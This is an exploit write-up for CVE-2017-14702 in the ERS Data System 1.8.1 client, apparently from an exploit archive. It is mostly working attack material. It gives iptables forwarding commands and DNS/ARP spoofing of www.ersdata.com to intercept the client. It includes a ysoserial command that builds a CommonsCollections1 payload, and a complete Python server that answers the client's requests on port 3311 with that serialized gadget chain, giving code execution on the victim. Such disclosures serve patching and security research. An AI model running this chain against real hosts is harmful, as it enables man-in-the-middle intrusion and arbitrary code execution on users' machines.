
ERS Data System 1.8.1 Java Deserialization

Posted on 05 October 2017

# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitation:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311
# and deserializes the response it gets back (the com.branaghgroup.ecers.update.UpdateRequest path). Because the channel is
# neither encrypted nor authenticated, anyone who can answer that request in place of the real API gets code execution on
# the client host.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding. Note that the script below
# flushes every iptables rule and sets all chain policies to ACCEPT, so run it only on a throwaway lab box, and replace
# 192.168.85.0/24 with the lab subnet:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
# Then poison DNS requests to the www.ersdata.com domain. The victim's DNS queries have to pass through the attacking
# machine for this to work (the tool's name suggests it ARP-spoofs the victim first); set localIP to the attacking
# machine's address so the spoofed answer points the client at the handler started in the next step:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicious serialized gadgets.
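#!/usr/bin/python
# For example: a minimal stand-in for the www.ersdata.com API that answers every
# POST on TCP 3311 with a ysoserial gadget chain.  The thick client deserializes
# the response body (the com.branaghgroup.ecers.update.UpdateRequest path), so
# whatever Java serialization stream is served here runs on the client host.
#
# Lab use only.  GET requests are not overridden and fall through to
# SimpleHTTPRequestHandler, which lists and serves the current working
# directory to anyone who connects -- start this from an empty directory.
import sys

try:  # Python 3
    from socketserver import TCPServer
    from http.server import SimpleHTTPRequestHandler
except ImportError:  # Python 2, which the original script was written for
    from SocketServer import TCPServer
    from SimpleHTTPServer import SimpleHTTPRequestHandler

# Port the thick client uses for its plain-HTTP API connection.
PORT = 3311

# Default payload file.  Generate it with ysoserial rather than pasting the hex
# into the script (the embedded literal in the original was ~4 KB and easy to
# corrupt when copied):
#   java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# CommonsCollections1 needs Apache Commons Collections 3.x on the client's
# classpath; the tested client evidently ships it.
DEFAULT_PAYLOAD = "calc.bin"

# Leading bytes of every Java serialization stream (STREAM_MAGIC).
_JAVA_STREAM_MAGIC = b"\xac\xed"


class HTTPHandler(SimpleHTTPRequestHandler):
    """Answer every POST with the serialized gadget chain held in ``payload``."""

    # Raw Java serialization stream to serve.  main() fills this in from the
    # payload file once, so every handler instance shares the same bytes.
    payload = b""

    def do_POST(self):
        """Respond 200 with ``payload`` as the body, whatever the path or request body.

        The request body is not read; the connection is closed after the
        response, so the unread bytes are simply discarded with the socket.
        """
        body = self.payload
        self.send_response(200)
        # text/html is what the original, tested exploit sent; left unchanged.
        self.send_header("Content-type", "text/html")
        self.send_header("Content-length", len(body))
        self.end_headers()
        self.wfile.write(body)


class _ReusableTCPServer(TCPServer):
    """TCPServer that can rebind PORT immediately after a restart (TIME_WAIT)."""

    allow_reuse_address = True


def main(argv=None):
    """Load the payload file and serve it on PORT until Ctrl-C.

    Args:
        argv: optional argument list; ``argv[0]`` is the path of the ysoserial
            output.  Defaults to ``sys.argv[1:]``, falling back to
            DEFAULT_PAYLOAD in the current directory.

    Raises:
        IOError/OSError: if the payload file cannot be read or PORT cannot be
            bound.  The original swallowed these with a bare ``except`` and
            printed "Exiting...", which hid a failed bind.
    """
    args = sys.argv[1:] if argv is None else argv
    path = args[0] if args else DEFAULT_PAYLOAD
    with open(path, "rb") as fh:
        HTTPHandler.payload = fh.read()
    if not HTTPHandler.payload.startswith(_JAVA_STREAM_MAGIC):
        # Not a Java serialization stream; the client will not deserialize it.
        sys.stderr.write(
            "warning: %s does not start with the Java stream magic AC ED\n" % path
        )

    httpd = _ReusableTCPServer(("", PORT), HTTPHandler)
    print("Serving at port: %d" % PORT)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print("Exiting...")
    finally:
        httpd.server_close()


if __name__ == "__main__":
    main()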

 
